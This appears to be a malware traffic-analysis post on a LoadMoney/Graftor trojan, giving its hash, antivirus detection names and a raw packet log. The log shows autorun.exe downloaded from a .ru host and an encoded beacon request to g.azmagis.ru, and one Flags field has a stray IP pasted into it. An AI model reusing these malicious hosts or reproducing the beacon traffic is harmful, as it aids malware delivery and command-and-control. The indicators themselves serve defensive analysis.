Graftor LoadMoney 185.20.186.52 Malware Trojan Clickfraud PCAP File Download Traffic Analysis

SHA256: 572b756cd5cfda893c5e32f7bdcb4e44d57e7101b507afcdee8646b3417fe6e3
File name: autorun.exe
Detection ratio: 47 / 56
Analysis date: 2016-11-26 23:22:55 UTC ( 0 minutes ago )
AhnLab-V3 PUP/Win32.LoadMoney.C1370399 20161126
Antiy-AVL Trojan[:HEUR]/Win32.AGeneric 20161126
Arcabit Trojan.Graftor.D42051 20161126
Avast Win32:Malware-gen 20161126
Avira (no cloud) APPL/Agent.755 20161126
BitDefender Gen:Variant.Graftor.270417 20161126
CAT-QuickHeal Trojan.Mupad 20161126
Comodo ApplicUnwnt.Win32.RuKometa.~A 20161126
CrowdStrike Falcon (ML) malicious_confidence_68% (D) 20161024
Cyren W32/Selfdel.N 20161127
DrWeb Trojan.LoadMoney.1377 20161127
ESET-NOD32 a variant of Win32/RuKometa.E potentially unwanted 20161126
Emsisoft Gen:Variant.Graftor.270417 (B) 20161127
F-Prot W32/Selfdel.N 20161127
F-Secure Gen:Variant.Graftor.270417 20161127
Fortinet W32/SelfDel.BTBP!tr 20161127
GData Gen:Variant.Graftor.270417

2016-11-26 17:34:54.019260 IP 192.168.1.102.51015 > 82.118.16.96.80: Flags [P.], seq 0:386, ack 1, win 256, length 386: HTTP: GET /autorun.exe HTTP/1.1
E….K@……..fRv.`.G.P~..:.S..P…….GET /autorun.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
If-Modified-Since: Thu, 07 Apr 2016 10:57:14 GMT
If-None-Match: “57063d0a-30a50”
Host: uhfoeujcqfoihdi.referparty.ru
Connection: Keep-Alive

2016-11-26 17:34:54.169528 IP 192.168.1.102.51015 > 82.118.16.96.80: Flags [.], ack 172, win 255, length 0
E..(.L@……..fRv.`.G.P~….S..P…9………
2016-11-26 17:34:54.171251 IP 192.168.1.102.51015 > 82.118.16.96.80: Flags [F.], seq 386, ack 172, win 255, length 0
E..(.M@……..fRv.`.G.P~….S..P…9………
2016-11-26 17:34:57.514854 IP 192.168.1.102.62604 > 75.75.75.75.53: 25856+ A? crl.usertrust.com. (35)
E..?…….R…fKKKK…5.+.We…………crl    usertrust.com…..
2016-11-26 17:34:57.536654 IP 192.168.1.102.51016 > 178.255.83.2.80: Flags185.20.186.52 [S], seq 1392431157, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@……..f..S..H.PR..5…… ..3…………..
2016-11-26 17:34:57.572643 IP 192.168.1.102.51016 > 178.255.83.2.80: Flags [.], ack 1689782253, win 256, length 0
E..(..@……..f..S..H.PR..6d…P….Q……..
2016-11-26 17:34:57.573155 IP 192.168.1.102.51016 > 178.255.83.2.80: Flags [P.], seq 0:198, ack 1, win 256, length 198: HTTP: GET /AddTrustExternalCARoot.crl HTTP/1.1
E…..@….’…f..S..H.PR..6d…P…….GET /AddTrustExternalCARoot.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.usertrust.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

 

2016-11-26 17:35:01.948228 IP 192.168.1.102.51018 > 185.20.186.52.80: Flags [P.], seq 0:488, ack 1, win 256, length 488: HTTP: GET /%f3%07%27%f6%46%d3%16%57%47%f6%27%57%e6%62%67%56%27%37%96%f6%e6%d3%33%e2%23%03%62%76%57%96%46%d3%23%83%93%63%93%26%16%03%66%63%33%83%43%23%73%36%83%56%83%26%23%66%53%33%63%56%93%13%73%66%33%63%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
E…..@……..f…4.J.Pl1…..eP….x..GET /%f3%07%27%f6%46%d3%16%57%47%f6%27%57%e6%62%67%56%27%37%96%f6%e6%d3%33%e2%23%03%62%76%57%96%46%d3%23%83%93%63%93%26%16%03%66%63%33%83%43%23%73%36%83%56%83%26%23%66%53%33%63%56%93%13%73%66%33%63%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
User-Agent: autorun 3.20
Host: g.azmagis.ru
Cache-Control: no-cache